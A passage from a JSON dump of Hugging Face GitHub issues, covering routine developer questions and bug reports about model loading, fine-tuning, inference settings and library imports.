script.py (eg. onnx.py) without issues\r\n\r\nOR\r\n\r\nThere's a really clear error message that states \"please do not use the following reserved names for your python scripts: eg1.py, eg2.py, etc\"\r\n\r\nMuch appreciated", "url": "https://github.com/huggingface/optimum/issues/1401", "state": "open", "labels": [ "bug" ], "created_at": "2023-09-21T04:12:49Z", "updated_at": "2023-10-05T14:32:40Z", "comments": 1, "user": "gidzr" }, { "repo": "huggingface/diffusers", "number": 5124, "title": "How to fine tune checkpoint .safetensor", "body": "### Describe the bug\n\nI tried to fine tuning a model from a checkpoint (i.e https://civitai.com/models/119202/talmendoxl-sdxl-uncensored-full-model)I converted the checkpoint to diffuser format using this library:\r\nhttps://github.com/waifu-diffusion/sdxl-ckpt-converter/\r\n\r\nThe model converted works fine for inference and the training script works fine if I use a standard base i.e.: \"stabilityai/stable-diffusion-xl-base-1.0\", but I have error when start from converted model\n\n### Reproduction\n\ndownload checkpoint: https://civitai.com/models/119202/talmendoxl-sdxl-uncensored-full-model\r\nconvert using: https://github.com/waifu-diffusion/sdxl-ckpt-converter/\r\ntstart training with:\r\n !accelerate launch train_text_to_image_lora_sdxl.py \\\r\n --pretrained_model_name_or_path=\"/content/drive/MyDrive/talmendoxlSDXL_v11Beta\" \\\r\n --pretrained_vae_model_name_or_path=\"madebyollin/sdxl-vae-fp16-fix\" \\\r\n --dataset_name=\"$INSTANCE_DIR_PARSED\" \\\r\n --caption_column=\"text\" \\\r\n --resolution=1024 \\\r\n --train_batch_size=1 \\\r\n --num_train_epochs=$TRAIN_EPOCHS \\\r\n --checkpointing_steps=1000000 \\\r\n --learning_rate=$LEARNING_RATE \\\r\n --lr_scheduler=\"constant\" \\\r\n --lr_warmup_steps=0 \\\r\n --seed=42 \\\r\n --output_dir=\"$OUTPUT_DIR\" \\\r\n --enable_xformers_memory_efficient_attention \\\r\n --gradient_checkpointing \\\r\n --mixed_precision=\"fp16\" \\\r\n --use_8bit_adam \n\n### Logs\n\n```shell\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\n{'clip_sample_range', 'dynamic_thresholding_ratio', 'variance_type', 'thresholding'} was not found in config. Values will be initialized to default values.\r\nTraceback (most recent call last):\r\n File \"/content/diffusers/examples/text_to_image/train_text_to_image_lora_sdxl.py\", line 1271, in \r\n main(args)\r\n File \"/content/diffusers/examples/text_to_image/train_text_to_image_lora_sdxl.py\", line 554, in main\r\n text_encoder_one = text_encoder_cls_one.from_pretrained(\r\n File \"/usr/local/lib/python3.10/dist-packages/transformers/modeling_utils.py\", line 2740, in from_pretrained\r\n raise EnvironmentError(\r\nOSError: Error no file named pytorch_model.bin, tf_model.h5, model.ckpt.index or flax_model.msgpack found in directory /content/drive/MyDrive/talmendoxlSDXL_v11Beta.\r\nTraceback (most recent call last):\r\n File \"/usr/local/bin/accelerate\", line 8, in \r\n sys.exit(main())\r\n File \"/usr/local/lib/python3.10/dist-packages/accelerate/commands/accelerate_cli.py\", line 45, in main\r\n args.func(args)\r\n File \"/usr/local/lib/python3.10/dist-packages/accelerate/commands/launch.py\", line 979, in launch_command\r\n simple_launcher(args)\r\n File \"/usr/local/lib/python3.10/dist-packages/accelerate/commands/launch.py\", line 628, in simple_launcher\r\n raise subprocess.CalledProcessError(returncode=process.returncode, cmd=cmd)\r\nsubprocess.CalledProcessError: Command '['/usr/bin/python3', 'train_text_to_image_lora_sdxl.py', '--pretrained_model_name_or_path=/content/drive/MyDrive/talmendoxlSDXL_v11Beta', '--pretrained_vae_model_name_or_path=madebyollin/sdxl-vae-fp16-fix', '--dataset_name=/content/instancefolder_parsed', '--caption_column=text', '--resolution=1024', '--train_batch_size=1', '--num_train_epochs=1', '--checkpointing_steps=1000000', '--learning_rate=2e-05', '--lr_scheduler=constant', '--lr_warmup_steps=0', '--seed=42', '--output_dir=/content/lora-trained-xl-colab', '--enable_xformers_memory_efficient_attention', '--gradient_checkpointing', '--mixed_precision=fp16', '--use_8bit_adam']' returned non-zero exit status 1.\n```\n\n\n### System Info\n\n- `diffusers` version: 0.21.0.dev0\r\n- Platform: Linux-5.15.120+-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- PyTorch version (GPU?): 2.0.1+cu118 (True)\r\n- Huggingface_hub version: 0.17.2\r\n- Transformers version: 4.33.2\r\n- Accelerate version: 0.21.0\r\n- xFormers version: 0.0.21\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n@williamberman, @patrickvonplaten, @sayakpau", "url": "https://github.com/huggingface/diffusers/issues/5124", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-09-20T22:45:38Z", "updated_at": "2023-11-22T15:06:19Z", "user": "EnricoBeltramo" }, { "repo": "huggingface/diffusers", "number": 5118, "title": "how to use controlnet's reference_only fuction with diffusers??", "body": "### Model/Pipeline/Scheduler description\n\ncan anyone help me to understand how to use controlnet's reference_only fuction with diffusers\n\n### Open source status\n\n- [ ] The model implementation is available\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/5118", "state": "closed", "labels": [ "stale" ], "created_at": "2023-09-20T10:17:53Z", "updated_at": "2023-11-08T15:07:34Z", "user": "sudip550" }, { "repo": "huggingface/transformers.js", "number": 321, "title": "[Question] Image Embeddings for ViT", "body": "Is it possible to get image embeddings using Xenova/vit-base-patch16-224-in21k model? We use feature_extractor to get embeddings for sentences. Can we use feature_extractor to get image embeddings?\r\n```js\r\nconst model_id = \"Xenova/vit-base-patch16-224-in21k\";\r\nconst image = await RawImage.read(\"https://huggingface.co/datasets/Xenova/transformers.js-docs/resolve/main/football-match.jpg\");\r\nconst classifier = await pipeline(\"image-classification\", model_id);\r\nconst { image_embeddings } = await classifier.processor.feature_extractor(image);\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/321", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-20T01:22:08Z", "updated_at": "2024-01-13T01:25:03Z", "user": "hadminh" }, { "repo": "huggingface/optimum", "number": 1395, "title": "TensorrtExecutionProvider documentation", "body": "### System Info\n\n```shell\nmain, docs\n```\n\n\n### Who can help?\n\n@fxmarty \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nThe method described in the docs for [TRT engine building](https://huggingface.co/docs/optimum/onnxruntime/usage_guides/gpu#tensorrt-engine-build-and-warmup) is outdated, first mentioned [here](https://github.com/huggingface/optimum/issues/842#issuecomment-1568766399), I tested the dynamic shapes method in `optimum-benchmark` [here](https://github.com/huggingface/optimum-benchmark/pull/55#issuecomment-1721180586). \n\n### Expected behavior\n\nWe can update the docs with this snippet:\r\n\r\n```python\r\nprovider_options = {\r\n \"trt_engine_cache_enable\": True,\r\n \"trt_engine_cache_path\": \"tmp/trt_cache_gpt2_example\",\r\n \"trt_profile_min_shapes\": \"input_ids:1x16,attention_mask:1x16\",\r\n \"trt_profile_max_shapes\": \"input_ids:1x64,attention_mask:1x64\",\r\n \"trt_profile_opt_shapes\": \"input_ids:1x32,attention_mask:1x32\",\r\n}\r\n\r\nort_model = ORTModelForCausalLM.from_pretrained(\r\n \"gpt2\",\r\n export=True,\r\n use_cache=False,\r\n provider=\"TensorrtExecutionProvider\",\r\n provider_options=provider_options,\r\n)\r\n\r\nort_model.generate(\r\n input_ids=torch.tensor([[1] * 16]).to(\"cuda\"),\r\n max_new_tokens=64-16,\r\n min_new_tokens=64-16,\r\n pad_token_id=0,\r\n eos_token_id=0,\r\n)\r\n```\r\n\r\nthough it's still not clear to me what's the effect of `trt_profile_opt_shapes`.", "url": "https://github.com/huggingface/optimum/issues/1395", "state": "open", "labels": [ "documentation", "onnxruntime" ], "created_at": "2023-09-19T09:06:17Z", "updated_at": "2023-09-19T09:57:26Z", "comments": 1, "user": "IlyasMoutawwakil" }, { "repo": "huggingface/transformers.js", "number": 317, "title": "How to use xenova/transformers in VSCode Extension", "body": "Hey guys! I am trying to use xenova/transformers in CodeStory, we roll a vscode extension as well and I am hitting issues with trying to get the import working, here's every flavor of importing the library which I have tried to date.\r\n\r\n```\r\nconst TransformersApi = Function('return import(\"@xenova/transformers\")')();\r\nconst { pipeline, env } = await TransformersApi;\r\n```\r\n\r\n```\r\nconst { pipeline, env } = await import('@xenova/transformers')\r\n```\r\n\r\n```\r\nconst TransformersApi = require('@xenova/transformers');\r\nconst { pipeline, env } = await TransformersApi;\r\n```\r\n\r\nI think the crux of the issue is the node environment which VSCode uses which does not allow any of these to work, and I keep getting the deaded:\r\n\r\n```\r\nError [ERR_REQUIRE_ESM]: require() of ES Module /Applications/Aide.app/Contents/Resources/app/extensions/codestory/node_modules/@xenova/transformers/src/transformers.js from /Applications/Aide.app/Contents/Resources/app/extensions/codestory/out/llm/embeddings/sentenceTransformers.js not supported.\r\nInstead change the require of transformers.js in /Applications/Aide.app/Contents/Resources/app/extensions/codestory/out/llm/embeddings/sentenceTransformers.js to a dynamic import() which is available in all CommonJS modules.\r\n\r\n```\r\n\r\nafter checking the js code which is generated, it ends up including the require word:\r\n```\r\n__importStar(require('@xenova/transformers'))\r\n```\r\n\r\nwhen I used the first option which was a function I got a very weird error btw:\r\n```\r\n[Extension Host] TypeError: A dynamic import callback was not specified.\r\n at new NodeError (node:internal/errors:399:5)\r\n at importModuleDynamicallyCallback (node:internal/process/esm_loader:39:9)\r\n at eval (eval at (/Applications/Aide.app/Contents/Resources/app/extensions/codestory/out/llm/embeddings/sentenceTransformers.js:46:41), :3:1)\r\n\r\n```\r\n\r\nthis is mostly comping from the node version which VSCode uses itself.\r\n\r\nDo you guys have any suggestions on what I can do about this? Thanks!", "url": "https://github.com/huggingface/transformers.js/issues/317", "state": "open", "labels": [ "question" ], "created_at": "2023-09-19T01:35:21Z", "updated_at": "2024-07-27T20:36:37Z", "user": "theskcd" }, { "repo": "huggingface/candle", "number": 894, "title": "How to fine-tune Llama?", "body": "Hello everybody,\r\n\r\nI am trying to fine-tune the Llama model, but cannot load the safetensors file. I have modified the training loop for debugging and development:\r\n```rust\r\npub fn run(args: &crate::TrainingCmd, common_args: &crate::Args) -> Result<()> {\r\n let config_path = match &args.config {\r\n Some(config) => std::path::PathBuf::from(config),\r\n None => {\r\n let api = hf_hub::api::sync::Api::new().unwrap();\r\n println!(\"loading the model weights from {}\", args.model_id);\r\n let api = api.model(args.model_id.clone());\r\n api.get(&args.which_model).unwrap()\r\n }\r\n };\r\n\r\n\r\n let device = candle_examples::device(common_args.cpu)?;\r\n let config = Config::tiny();\r\n \r\n let mut varmap = candle_nn::VarMap::new();\r\n let vb = candle_nn::VarBuilder::from_varmap(&varmap, DType::F32, &device);\r\n varmap.load(config_path).unwrap();\r\n\r\n /*let cache = Cache::new(false, &config, vb.pp(\"rot\"))?;\r\n let model = Llama::load(vb, &cache, config, true)?;\r\n\r\n let params = candle_nn::ParamsAdamW {\r\n lr: args.learning_rate,\r\n ..Default::default()\r\n };\r\n let mut opt = candle_nn::AdamW::new(varmap.all_vars(), params)?;\r\n for (batch_index, batch) in batch_iter.enumerate() {\r\n let (inp, tgt) = batch?;\r\n let logits = model.forward(&inp, 0)?;\r\n let loss = candle_nn::loss::cross_entropy(&logits.flatten_to(1)?, &tgt.flatten_to(1)?)?;\r\n opt.backward_step(&loss)?;\r\n\r\n if batch_index > 0 && batch_index % 1000 == 0 {\r\n varmap.save(\"checkpoint.safetensors\")?\r\n }\r\n }*/\r\n Ok(())\r\n}\r\n```\r\n\r\nI realize this error is likely because I cannot use VarMap::load to load such a large safetensors file (as described [here](https://github.com/huggingface/safetensors/blob/main/README.md#benefits)). However, how can I use VarMap (or something else that allows me to modifiy the tensor map) to load the weights? If there is not such a method, how should I implement this myself?\r\n\r\nThank you!\r\nEric", "url": "https://github.com/huggingface/candle/issues/894", "state": "closed", "labels": [], "created_at": "2023-09-18T22:18:04Z", "updated_at": "2023-09-21T10:05:57Z", "user": "EricLBuehler" }, { "repo": "huggingface/candle", "number": 891, "title": "How to do fine-tuning?", "body": "Hello everybody,\r\n\r\nI was looking through the Candle examples and cannot seem to find an example of fine-tuning for Llama. It appears the only example present is for training from scratch. How should I fine-tune a pretrained model on my own data? Or, more generally, how should I fine tune a model that it loaded from a safetensor file (and whose VarBuilder is immutable as discussed in #883)?\r\n\r\nThanks!\r\nEric", "url": "https://github.com/huggingface/candle/issues/891", "state": "closed", "labels": [], "created_at": "2023-09-18T18:37:42Z", "updated_at": "2024-07-08T15:13:01Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers", "number": 26218, "title": "How to manually set the seed of randomsampler generator when training using transformers trainer", "body": "### System Info\r\n\r\nI used a [script](https://github.com/huggingface/transformers/blob/v4.33.0/examples/pytorch/language-modeling/run_clm.py) to continue pre-training the llama2 model. In the second epoch, the loss began to explode, so I chose to reload the checkpoint to continue training, but the loss changes were completely consistent with before, which made me doubt the iteration of the dataset is always consistent. So I tried modifying the [seed.](https://github.com/huggingface/transformers/blob/v4.33.0/examples/pytorch/language-modeling/run_clm.py#L309C33-L309C33) But in the end, my training loss is always consistent, and the state I print randomsampler is always the same. \r\nI hope someone can tell me how to solve this problem, including where the seed of this generator is specified.\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\ntransformers==4.33.0\r\npytorch==1.13.1\r\naccelerate==0.21.0\r\ndeepspeed==0.10.0\r\n\r\n### Expected behavior\r\n\r\nI hope that the sampling of training data set should be different every time.", "url": "https://github.com/huggingface/transformers/issues/26218", "state": "closed", "labels": [], "created_at": "2023-09-18T14:19:11Z", "updated_at": "2023-11-20T08:05:37Z", "user": "young-chao" }, { "repo": "huggingface/transformers.js", "number": 313, "title": "[Question] How to use remote models for automatic-speech-recognition", "body": "I have an html file that is\r\n```\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n```\r\n\r\nI'm just trying to load the model, but it seems to be requesting from local url rather than hugging face. How can I enable remote models?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/313", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-18T04:56:52Z", "updated_at": "2023-09-18T05:19:00Z", "user": "LehuyH" }, { "repo": "huggingface/candle", "number": 883, "title": "Question: How to properly use VarBuilder?", "body": "Hello everybody,\n\nI am working on implementing LoRA and want to use the VarBuilder system. However, when I try to get a tensor with get_with_hints, I get a CannotFindTensor Err. To create the Tensor, I do:\n```rust\nvb.pp(\"a\").get_with_hints(\n...lora specific shape...\n\"weight\",\n...lora specific hints...\n)\n```\nHowever, this fails with the CannotFindTensor error. How can I create the Tensor, or perhaps am I using the API incorrectly?\n\nThanks!\nEric", "url": "https://github.com/huggingface/candle/issues/883", "state": "closed", "labels": [], "created_at": "2023-09-17T20:40:27Z", "updated_at": "2023-09-17T21:02:24Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers.js", "number": 310, "title": "How to load model from the static folder path in nextjs or react or vanilla js?", "body": "\r\n", "url": "https://github.com/huggingface/transformers.js/issues/310", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-17T14:13:57Z", "updated_at": "2023-09-27T08:36:29Z", "user": "adnankarim" }, { "repo": "huggingface/safetensors", "number": 360, "title": "The default file format used when loading the model\uff1f", "body": "I guess that huggingface loads .safetensor files by default when loading models. Is this mandatory? Can I choose to load files in. bin format? (Because I only downloaded weights in bin format, and it reported an error \u201c could not find a file in safeTensor format\u201d). I do not find related infomation in docs.\n\nThanks for your help.", "url": "https://github.com/huggingface/safetensors/issues/360", "state": "closed", "labels": [], "created_at": "2023-09-15T14:56:13Z", "updated_at": "2023-09-19T10:34:57Z", "comments": 1, "user": "Kong-Aobo" }, { "repo": "huggingface/diffusers", "number": 5055, "title": "How to download config.json if it is not in the root directory.", "body": "Is there any way to download vae for a model where config.json is not in the root directory?\r\n\r\n```python\r\nvae = AutoencoderKL.from_pretrained(\"redstonehero/kl-f8-anime2\")\r\n``` \r\n\r\nFor example, as shown above, there is no problem if config.json exists in the root directory, but if it does not exist, an error will occur.\r\n\r\n```python\r\nvae = AutoencoderKL.from_pretrained(\"hakurei/waifu-diffusion\")\r\n``` \r\nI would be glad to get your advice.", "url": "https://github.com/huggingface/diffusers/issues/5055", "state": "closed", "labels": [], "created_at": "2023-09-15T11:37:47Z", "updated_at": "2023-09-16T00:15:58Z", "user": "suzukimain" }, { "repo": "huggingface/transformers.js", "number": 305, "title": "[Question] Can I work with Peft models through the API?", "body": "Let's say I have the following code in Python. How would I translate that to js?\r\n\r\n````\r\nimport torch\r\nfrom peft import PeftModel, PeftConfig\r\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\r\n\r\npeft_model_id = \"samwit/bloom-7b1-lora-tagger\"\r\nconfig = PeftConfig.from_pretrained(peft_model_id)\r\nmodel = AutoModelForCausalLM.from_pretrained(config.base_model_name_or_path, return_dict=True, load_in_8bit=True, device_map='auto')\r\ntokenizer = AutoTokenizer.from_pretrained(config.base_model_name_or_path)\r\n\r\n# Load the Lora model\r\nmodel = PeftModel.from_pretrained(model, peft_model_id)\r\n````\r\n", "url": "https://github.com/huggingface/transformers.js/issues/305", "state": "open", "labels": [ "question" ], "created_at": "2023-09-14T21:02:59Z", "updated_at": "2023-09-16T00:16:03Z", "user": "chrisfel-dev" }, { "repo": "huggingface/diffusers", "number": 5042, "title": "How to give number of inference steps to Wuerstchen prior pipeline", "body": "**this below working with default DEFAULT_STAGE_C_TIMESTEPS but it always generates with exactly 29 number of prior inference steps** \r\n\r\n```\r\n prior_output = prior_pipeline(\r\n prompt=prompt,\r\n height=height,\r\n width=width,\r\n\t\tnum_inference_steps=prior_num_inference_steps,\r\n timesteps=DEFAULT_STAGE_C_TIMESTEPS,\r\n negative_prompt=negative_prompt,\r\n guidance_scale=prior_guidance_scale,\r\n num_images_per_prompt=num_images_per_prompt,\r\n generator=generator,\r\n callback=callback_prior,\r\n )\r\n```\r\n\r\n\r\nwhen i make it like below i got this error\r\n\r\n```\r\n prior_output = prior_pipeline(\r\n prompt=prompt,\r\n height=height,\r\n width=width,\r\n\t\tprior_num_inference_steps = prior_num_inference_steps,\r\n # timesteps=DEFAULT_STAGE_C_TIMESTEPS,\r\n negative_prompt=negative_prompt,\r\n guidance_scale=prior_guidance_scale,\r\n num_images_per_prompt=num_images_per_prompt,\r\n generator=generator,\r\n callback=callback_prior,\r\n )\r\n```\r\n\r\n`TypeError: WuerstchenPriorPipeline.__call__() got an unexpected keyword argument 'prior_num_inference_steps'`\r\n\r\n\r\nBut the documentation showing it???\r\n\r\nhttps://huggingface.co/docs/diffusers/main/en/api/pipelines/wuerstchen\r\n\r\n`prior_num_inference_steps (Union[int, Dict[float, int]], optional, defaults to 30) \u2014 The number of prior denoising steps. More denoising steps usually lead to a higher quality image at the expense of slower inference. For more specific timestep spacing, you can pass customized prior_timesteps`\r\n\r\n@sayakpaul @dome272 @patrickvonplaten @williamberman\r\n\r\n\r\n**Here below entire code. what I want is being able to set any number of prior and decoder number of inference steps**\r\n\r\n```\r\n prior_output = prior_pipeline(\r\n prompt=prompt,\r\n height=height,\r\n width=width,\r\n\t\tprior_num_inference_steps = prior_num_inference_steps,\r\n # timesteps=DEFAULT_STAGE_C_TIMESTEPS,\r\n negative_prompt=negative_prompt,\r\n guidance_scale=prior_guidance_scale,\r\n num_images_per_prompt=num_images_per_prompt,\r\n generator=generator,\r\n callback=callback_prior,\r\n )\r\n\r\n if PREVIEW_IMAGES:\r\n for _ in range(len(DEFAULT_STAGE_C_TIMESTEPS)):\r\n r = next(prior_output)\r\n if isinstance(r, list):\r\n yield r\r\n prior_output = r\r\n \r\n decoder_output = decoder_pipeline(\r\n image_embeddings=prior_output.image_embeddings,\r\n prompt=prompt,\r\n\t\tnum_inference_steps = decoder_num_inference_steps,\r\n # timesteps=decoder_timesteps,\r\n guidance_scale=decoder_guidance_scale,\r\n negative_prompt=negative_prompt,\r\n generator=generator,\r\n output_type=\"pil\",\r\n ).images\r\n yield decoder_output\r\n```\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/5042", "state": "closed", "labels": [ "bug" ], "created_at": "2023-09-14T15:21:31Z", "updated_at": "2023-09-20T07:41:19Z", "user": "FurkanGozukara" }, { "repo": "huggingface/chat-ui", "number": 440, "title": "Web Search not working ", "body": "i have been having this issues where it just searches something but then never shows me the answer it shows max tokens\r\ni just keep seeing this\r\nfirst i see the links of the resources\r\n\r\n\r\nbut then it does nothing at all\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/108006611/6eefb6a4-426e-408c-85bb-1106161fd481)\r\n\r\ni just see this and do not even get the model response", "url": "https://github.com/huggingface/chat-ui/issues/440", "state": "closed", "labels": [ "support" ], "created_at": "2023-09-14T13:50:15Z", "updated_at": "2023-09-20T14:16:49Z", "comments": 5, "user": "bilalazhar72" }, { "repo": "huggingface/chat-ui", "number": 438, "title": "running the app with websearch fails", "body": "Hey after adding the serper api key I'm trying to run the app locally \"nmp run dev\" and I get an issue related to websearch:\r\n\r\n```\r\n[vite]: Rollup failed to resolve import \"@xenova/transformers\" from \"C:/Users/username/chat-ui/src/lib/server/websearch/sentenceSimilarity.ts\".\r\nThis is most likely unintended because it can break your application at runtime.\r\nIf you do want to externalize this module explicitly add it to\r\n`build.rollupOptions.external`\r\nerror during build:\r\nError: [vite]: Rollup failed to resolve import \"@xenova/transformers\" from \"C:/Users/username/chat-ui/src/lib/server/websearch/sentenceSimilarity.ts\".\r\nThis is most likely unintended because it can break your application at runtime.\r\nIf you do want to externalize this module explicitly add it to\r\n`build.rollupOptions.external`\r\n at viteWarn (file:///C:/Users/username/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:48142:27) \r\n at onRollupWarning (file:///C:/Users/username/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:48174:9)\r\n at onwarn (file:///C:/Users/username/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:47902:13) \r\n at file:///C:/Users/username/chat-ui/node_modules/rollup/dist/es/shared/node-entry.js:24152:13\r\n at Object.logger [as onLog] (file:///C:/Users/username/chat-ui/node_modules/rollup/dist/es/shared/node-entry.js:25825:9)\r\n at ModuleLoader.handleInvalidResolvedId (file:///C:/Users/rachel_shalom/chat-ui/node_modules/rollup/dist/es/shared/node-entry.js:24738:26)\r\n at file:///C:/Usersusername/chat-ui/node_modules/rollup/dist/es/shared/node-entry.js:24698:26\r\n \r\n```\r\nhow do I externelize this module and should I? anyone had this issue?", "url": "https://github.com/huggingface/chat-ui/issues/438", "state": "closed", "labels": [ "support" ], "created_at": "2023-09-14T11:21:35Z", "updated_at": "2023-09-14T12:08:00Z", "comments": 2, "user": "RachelShalom" }, { "repo": "huggingface/diffusers", "number": 5032, "title": "How to unfuse_lora only the first one after I have added multiple lora?", "body": "base.load_lora_weights(\"models/safetensors/SDXL/\u56fd\u98ce\u63d2\u753bSDXL.safetensors\") \r\nbase.fuse_lora(lora_scale=.7)\r\nbase.load_lora_weights(\"models/safetensors/SDXL/sd_xl_offset_example-lora_1.0.safetensors\")\r\nbase.fuse_lora(lora_scale=.8)\r\nNow, When I execute unfuse_lora() only the most recent one has been unfuse .\r\n\r\nso,how to unfuse '\u56fd\u98ce\u63d2\u753bSDXL.safetensors' or unfuse all lora weights", "url": "https://github.com/huggingface/diffusers/issues/5032", "state": "closed", "labels": [ "stale" ], "created_at": "2023-09-14T08:10:46Z", "updated_at": "2023-10-30T15:06:34Z", "user": "yanchaoguo" }, { "repo": "huggingface/optimum", "number": 1384, "title": "Documentation Request: Table or heuristic for Ortmodel Method to Encoder/Decoder to .onnx File to Task", "body": "### Feature request\r\n\r\nHi there\r\n\r\nCould you provide either a table (where explicit rules apply - see attached image), or a heuristic, so I can tell which ML models, optimised file types, with which tasks, apply to which inference methods and inference tasks?\r\n\r\nThe example table below will help to clarify, and isn't necessarily prescriptive, because I may have mixed some concepts.\r\n\r\nIn case you mention, yes - I'm aware that it's possible to run a pipeline with the wrong model, and an error message will spit out all the accepted architectures/models (roberta, gpt, etc) for a method type. However,\r\na) this is very time-consuming, hit and miss, and \r\nb) these 'lists' don't explain the relationships to the underlying architectures and files.. (ie. model_merged, encoder-decoder, encoder only, decoder only, that result from the pytorch, safetensor files.)\r\n\r\nFor example, will all models exported/optimised for text-generation always be encoder-decoder and always use the ORTSeq2SeqModel method (for illustrative purposes), or will this depend on a combination of the original model architecture and the task applied during optimisation, which may result in one or more usable methods for inference?\r\n\r\nIt's a massive learning curve for me, but seems it would be relatively straightforward to someone who works with this stuff . It probably just needs to go from peoples' heads into a document.\r\n\r\nThanks muchly! it'll be a massive time saver and help with conceptual understanding.\r\n\r\n### Motivation\r\n\r\nI'm trying to understand how to mix and match the models, optimisations, tasks, and inference methods.. Been trawling HF, ONNX, and general information but cannot find anything like this that exists, and would save a BUNCH of testing trial and error time. (like I've wasted directly and indirectly almost a week of trialling and there's probably very simple rules for this)\r\n\r\nPart of the time wasted has been selecting models and running CLI command to optimise/quantize for a task, only to discover I have no idea with ORTModel method to use, as these don't relate to task but model architecture instead (or a combination of both), and brute forcing an understanding with testing and trying to come up with my own heuristics.\r\n\r\nMaybe this type of knowledge is assumed? but for newbs like me it's extremely daunting and feels like I may be trying to re-invent the wheel.\r\n\r\n### Your contribution\r\n(table for illustrative purposes.. the dummy data is wrong.. )\r\n\r\n![method-task-model-llm-matrix](https://github.com/huggingface/optimum/assets/83053994/d25adf44-8cff-4a63-a5c7-312636f1dbaf)\r\n", "url": "https://github.com/huggingface/optimum/issues/1384", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-09-14T01:45:38Z", "updated_at": "2025-04-24T02:11:24Z", "comments": 4, "user": "gidzr" }, { "repo": "huggingface/optimum", "number": 1379, "title": "Can't use bettertransformer to train vit?", "body": "### System Info\n\n```shell\nTraceback (most recent call last):\r\n File \"test_bettertransformer_vit.py\", line 95, in \r\n main()\r\n File \"test_bettertransformer_vit.py\", line 92, in main\r\n test_train_time()\r\n File \"test_bettertransformer_vit.py\", line 86, in test_train_time\r\n out_vit = model(pixel_values).last_hidden_state\r\n File \"/opt/conda/lib/python3.8/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/opt/conda/lib/python3.8/site-packages/transformers/models/vit/modeling_vit.py\", line 587, in forward\r\n encoder_outputs = self.encoder(\r\n File \"/opt/conda/lib/python3.8/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/opt/conda/lib/python3.8/site-packages/transformers/models/vit/modeling_vit.py\", line 413, in forward\r\n layer_outputs = layer_module(hidden_states, layer_head_mask, output_attentions)\r\n File \"/opt/conda/lib/python3.8/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/root/.local/lib/python3.8/site-packages/optimum/bettertransformer/models/encoder_models.py\", line 1186, in forward\r\n raise NotImplementedError(\r\nNotImplementedError: Training and Autocast are not implemented for BetterTransformer + ViT. Please open an issue.\n```\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\ndef test_train_time():\r\n model = ViTModel.from_pretrained(model_pth).to('cuda')\r\n processor = ViTImageProcessor.from_pretrained(model_pth)\r\n pixel_values=clip_process(processor, pic_pth).cuda()\r\n if args.flash:\r\n model = model.to_bettertransformer()\r\n model.train()\r\n\r\n begin_time = time.time()\r\n for i in range(args.nums):\r\n out_vit = model(pixel_values).last_hidden_state\r\n\r\n print('use flash: {}, train vit time {:.2f}'.format(args.flash, time.time() - begin_time)) \n\n### Expected behavior\n\nnone", "url": "https://github.com/huggingface/optimum/issues/1379", "state": "closed", "labels": [ "bug" ], "created_at": "2023-09-13T12:49:53Z", "updated_at": "2025-02-20T08:38:26Z", "comments": 1, "user": "lijiaoyang" }, { "repo": "huggingface/text-generation-inference", "number": 1015, "title": "how to text-generation-benchmark through the local tokenizer ", "body": "The command i run in docker is\r\n\r\n```\r\ntext-generation-benchmark --tokenizer-name /data/checkpoint-5600/\r\n```\r\n\r\nThe error log is\r\n\r\n```\r\n2023-09-12T11:22:01.245495Z INFO text_generation_benchmark: benchmark/src/main.rs:132: Loading tokenizer\r\n2023-09-12T11:22:01.245966Z INFO text_generation_benchmark: benchmark/src/main.rs:141: Downloading tokenizer\r\n2023-09-12T11:22:31.270784Z WARN cached_path::cache: /root/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cached-path-0.6.1/src/cache.rs:564: ETAG fetch failed for https://huggingface.co//data/checkpoint-5600//resolve/main/tokenizer.json, retrying in 1957 milliseconds... \r\n2023-09-12T11:23:03.228297Z WARN cached_path::cache: /root/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cached-path-0.6.1/src/cache.rs:564: ETAG fetch failed for https://huggingface.co//data/checkpoint-5600//resolve/main/tokenizer.json, retrying in 2202 milliseconds... \r\n2023-09-12T11:23:35.430766Z WARN cached_path::cache: 